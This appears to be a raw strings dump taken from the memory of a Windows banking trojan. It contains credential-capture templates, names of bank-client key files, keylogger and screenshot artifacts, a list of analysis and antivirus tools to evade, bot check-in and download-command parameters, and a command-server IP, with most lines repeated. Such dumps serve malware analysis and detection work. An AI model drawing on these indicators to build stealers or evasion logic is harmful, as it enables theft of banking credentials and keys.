pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
EnumChildWindows
EnumChildWindows
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanExW
VkKeyScanExW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
6f6C6
6f6C6
8 8$8(8,8
8 8$8(8,8
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
Desk_%ux
Desk_%ux
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
.Prev
.Prev
.current
.current
HighMemoryEvent_x
HighMemoryEvent_x
winlogon.exe_716_rwx_01C40000_000C6000:
.text
.text
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
http
http
SSSh
SSSh
PASSu:8V
PASSu:8V
PASSu-8V
PASSu-8V
PSSSSSSSh
PSSSSSSSh
t%F;5
t%F;5
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.5.11
4.5.11
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
EnumChildWindows
EnumChildWindows
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanExW
VkKeyScanExW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
SYSTEM!XP9!F9BE9A8A
SYSTEM!XP9!F9BE9A8A
%WinDir%\apppatch\hwcmqr.exe
%WinDir%\apppatch\hwcmqr.exe
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
5`6C6Q6}6
6f6C6
6f6C6
8 8$8(8,8
8 8$8(8,8
`.data
`.data
.reloc
.reloc
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
Desk_%ux
Desk_%ux
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
.Prev
.Prev
.current
.current
HighMemoryEvent_x
HighMemoryEvent_x
Explorer.EXE_840_rwx_01F00000_00061000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
http
http
SSSh
SSSh
PASSu:8V
PASSu:8V
PASSu-8V
PASSu-8V
PSSSSSSSh
PSSSSSSSh
t%F;5
t%F;5
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.5.11
4.5.11
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
